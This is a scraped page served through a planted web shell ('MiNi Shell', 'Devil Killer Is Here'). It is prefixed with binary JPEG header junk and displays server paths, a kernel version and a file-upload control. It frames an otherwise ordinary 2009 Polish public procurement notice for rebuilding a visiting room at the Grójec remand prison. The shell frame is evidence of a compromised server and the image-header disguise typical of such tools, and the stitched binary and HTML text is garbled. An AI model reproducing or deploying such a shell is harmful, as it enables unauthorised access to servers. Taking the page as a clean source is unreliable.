JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/129392-N-2009.html

<p class="kh_header"><b>Warszawa: Modernizacja starego budynku administracyjnego 
na potrzeby sali widzeń w Areszcie Śledczym w Grójcu</b><br>
<b>Numer ogłoszenia: 129392 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowy Inspektorat Służby Więziennej w Warszawie , ul. Wiśniowa 50, 02-520 Warszawa, woj. mazowieckie, tel. 022 6408045, faks 022 6408024.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja starego budynku administracyjnego 
na potrzeby sali widzeń w Areszcie Śledczym w Grójcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest adaptacja istniejącego budynku administracyjnego z przeznaczeniem pomieszczeń parteru na węzeł wejściowy i kompleks sali widzeń. Na piętrze pozostaną pomieszczenia biurowe. Kształt i gabaryty budynku pozostają bez zmian. Budynek będzie połączony 
z nadbudowanym budynkiem administracyjnym na poziomie piętra. W celu uzyskania przestrzeni na salę widzeń, należy dokonać wyburzeń niektórych ścian parteru. Została zaprojektowana nowa klatka schodowa. Istniejące w części budynku stropy drewniane zamieniono na strop na belkach stalowych. Budynek dwukondygnacyjny częściowo podpiwniczony wykonany ponad sto lat temu w technologii tradycyjnej. Ściany istniejące murowane z cegły ceramicznej pełnej na zaprawie wapiennej o zróżnicowanej grubości.
Powierzchnia zabudowy - 264,57 m2
Powierzchnia netto - 362,79 m2
Powierzchnia użytkowa - 354,39 m2
Kubatura - 1958,0 m3
Jedyną zmianą w zagospodarowaniu działki jest wykonanie z istniejącego chodnika dodatkowego wejścia do budynku przeznaczonego dla ruchu pracowników administracji, interesantów oraz odwiedzających. Działka posiada bezpośredni dostęp do drogi publicznej ul. Armii Krajowej poprzez wjazd istniejący.

Działka uzbrojona:
- energia elektryczna
- woda z wodociągu miejskiego
- nieczystości płynne do kanalizacji miejskiej
Dostawa mediów i odbiór ścieków na dotychczasowych zasadach.

	Budynek administracji z wydzielonym na parterze kompleksem sali widzeń. Przy nowym wejściu zaprojektowano dyżurkę, z której będzie kontrolowany ruch osób oraz śluza wjazdowa. 
Dla oczekujących na widzenia przeznaczono poczekalnię przy wejściu do budynku. W sąsiedztwie sali widzeń zlokalizowano sanitariaty, kantynę oraz pomieszczenie widzeń przez telefon. Osadzeni będą doprowadzani na salę widzeń dwoma wejściami z dziedzińca wewnętrznego. Poprzez zabudowanie ścianką PCW części kontuaru funkcjonariusza nadzorującego widzenia, oraz zamontowania 
nad istniejącymi nadprożami rolet salę widzeń można rozdzielić na dwie części. W parterowej części budynku zlokalizowano pokój przesłuchań, salę wokand oraz korytarz umożliwiający komunikację pomiędzy dziedzińcem i śluzą. W kantynie będą sprzedawane produkty paczkowane oraz napoje 
w naczyniach jednorazowych. Dla pracownika kantyny przeznaczono WC na piętrze. Piętro w całości przeznaczone na funkcję biurową. Budynek będzie połączony na poziomie piętra z nadbudowanym budynkiem sąsiednim tworząc jedną kondygnację biurową. W nadbudowanej części znajdują 
się sanitariaty, pokój socjalny oraz pomieszczenie porządkowe zapewniające niezbędną obsługę 
tej części. 

1.	Opis stanu istniejącego i ocena stanu technicznego,
2.	Opis konstrukcji i rozwiązań materiałowych w tym: 
1. Roboty rozbiórkowe,
2. Fundamenty pod nowe ściany żelbetowe i betonowe,
3. Ściany murowane,
4. Nadproża,
5. Kominy wentylacyjne,
6. Izolacje przeciwwilgociowe,
7. Stropy,
8. Dach,
9. Tynki i okładziny,
10. Posadzki,
11. Malowanie,
12. Stolarka okienna,
13. Stolarka drzwiowa,
14. Ślusarka,
15. Ocieplenie ścian,
16. Kolorystyka elewacji,
17. Schody zewnętrzne,
18. Roboty zewnętrzne,
3.	Opis instalacji elektrycznych,
4.	Opis instalacji centralnego ogrzewania,
5.	Opis instalacji wod. - kan.,
6.	Opis instalacji systemu telewizji przemysłowej,
7.	Opis instalacji i okablowania strukturalnego,
8.	Opis instalacji systemu sygnalizacji pożaru
znajdują się w dokumentacji budowlanej. 

	Ze względu na dużą zawartość i rozmiar dokumentacja budowlana wraz z przedmiarami dostępna będzie w siedzibie zamawiającego zapisana w formacie PDF na płycie CD..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Termin wniesienia wadium upływa przed terminem składania ofert. Wadium musi obejmować okres związania ofertą to jest 30 dni od dnia otwarcia ofert. Oznacza to, że w terminie wniesienia wadium, 
z wyjątkiem pieniądza, należy złożyć do Głównej Księgowej Okręgowego Inspektoratu Służby Więziennej 
w Warszawie w siedzibie Zamawiającego przy ul. Wiśniowej 50 - II piętro. Wadium wnoszone w pieniądzu musi zostać przelane lub wpłacone na rachunek zamawiającego (w przypadku gotówki wpłaty należy dokonywać przelewem na konto Zamawiającego Nr Bank NBP O/W-wa 72 1010 1010 0402 4018 9110 0000) z adnotacją: Wadium - nr sprawy: 
OI-220-15/09. O uznaniu przez zmawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu środków na rachunek zamawiającego. Jeżeli Wykonawca nie wniesie wadium, 
w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą, zostanie przez zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> III.1 Wykonawca ubiegający się o zamówienie publiczne musi spełnić niżej wymienione warunki: 
A)  Wypełnić druk OFERTA (załącznik nr 1), który należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego. 
B) Wypełnić  druk Formularz cenowy (załącznik nr 2), który należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego.  Sporządzenie w innej formie spowoduje odrzucenie oferty. 
C) Złożyć polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
III.2 W przypadku składania oferty przez podmioty występujące wspólnie wymagane dokumenty muszą 
być złożone przez każdy podmiot..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A) oświadczenie o spełnieniu przez wykonawcę warunków, o którym mowa w art.22 Prawo Zamówień Publicznych,
B) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
C) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
D) Wykaz  realizacji o podobnym charakterze zrealizowanych w ciągu ostatnich 3 lat.  
IV.3 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa wyżej wymienione dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę 
lub miejsce zamieszkania, potwierdzające że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, 
nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone 
przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca 
ma siedzibę lub miejsce zamieszkania. 
IV.4 W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą 
być złożone przez każdy podmiot. 
IV.5 Podmioty występujące wspólnie zobowiązane są do załączenia do oferty umowy regulującej współpracę tych podmiotów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 02-520 Warszawa, ul. Wiśniowa 50.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 10:00, miejsce: 21.05.2009 godzina 10:00, miejsce: Okręgowy Inspektorat Służby Więziennej w Warszawie, ul. Wiśniowa 50, piętro II, sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com